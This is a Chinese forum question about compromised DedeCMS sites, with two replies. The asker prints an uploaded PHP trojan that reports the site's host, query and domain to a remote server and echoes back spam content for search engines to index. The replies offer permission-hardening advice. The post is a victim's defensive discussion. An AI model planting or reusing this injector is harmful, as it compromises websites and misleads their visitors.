发现很多织梦站,被上传了文件,导致收录了很多木马页面

发现很多织梦站,被上传了文件,导致收录了很多木马页面,



木马程序:






set_time_limit(0);




header("Content-Type: text/html;charset=gb2312");




date_default_timezone_set('PRC');




$Remote_server = "www.site.com";




$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];




$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);




echo $Content_mb;




?>




文件被上传到了静态目录页面,




静态目录文件权限:755   ;修改过文件权限的执行权限,发现后台生成静态页面失败,





请有遇到此问题的同学一起讨论。

2 人参与回答
刘友志

最表态设置目录权限 禁止写入权限,然后生成文章html的时候 放开权限,完事之后在恢复权限,织梦只能这样才能保险

大唐营销老胡

织梦用的人太多了。漏洞被放大

没有更多内容了
我来回答
发现很多织梦站,被上传了文件,导致收录了很多木马页面
匿名回答
我要提问 我来回答